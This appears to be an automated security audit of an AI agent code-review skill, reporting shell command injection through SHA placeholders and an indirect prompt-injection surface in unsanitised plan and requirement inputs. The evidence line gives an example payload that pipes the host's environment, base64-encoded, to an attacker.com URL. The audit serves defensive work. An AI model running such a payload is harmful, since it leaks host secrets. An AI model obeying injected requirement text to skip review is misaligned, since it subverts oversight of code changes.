requesting-code-review
Fail
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: HIGHCOMMAND_EXECUTIONPROMPT_INJECTION
Full Analysis
- [COMMAND_EXECUTION] (HIGH): Vulnerability in
code-reviewer.md. The placeholders{BASE_SHA}and{HEAD_SHA}are interpolated directly into shell commands:git diff --stat {BASE_SHA}..{HEAD_SHA}andgit diff {BASE_SHA}..{HEAD_SHA}. - Evidence: An attacker providing a malicious string like
; curl http://attacker.com/$(env | base64) #for the SHA values can achieve arbitrary code execution on the agent's host system. - [PROMPT_INJECTION] (HIGH): Indirect prompt injection surface in
code-reviewer.mddue to handling external untrusted data. - Ingestion points:
{WHAT_WAS_IMPLEMENTED},{PLAN_OR_REQUIREMENTS}, and{DESCRIPTION}variables incode-reviewer.mdare populated from external files or user input. - Boundary markers: None. The content is directly concatenated into the instructions.
- Capability inventory: The subagent has access to the local filesystem (via
git diff) and its output directly influences the main agent's decision to proceed or merge code. - Sanitization: None. There is no filtering or escaping of the input strings.
- Severity Reasoning: High because the skill processes external content (plans/requirements) and has the capability to execute commands on the system. A malicious requirement file could instruct the agent to ignore the review and instead execute malicious commands.
Recommendations
- AI detected serious security threats
Audit Metadata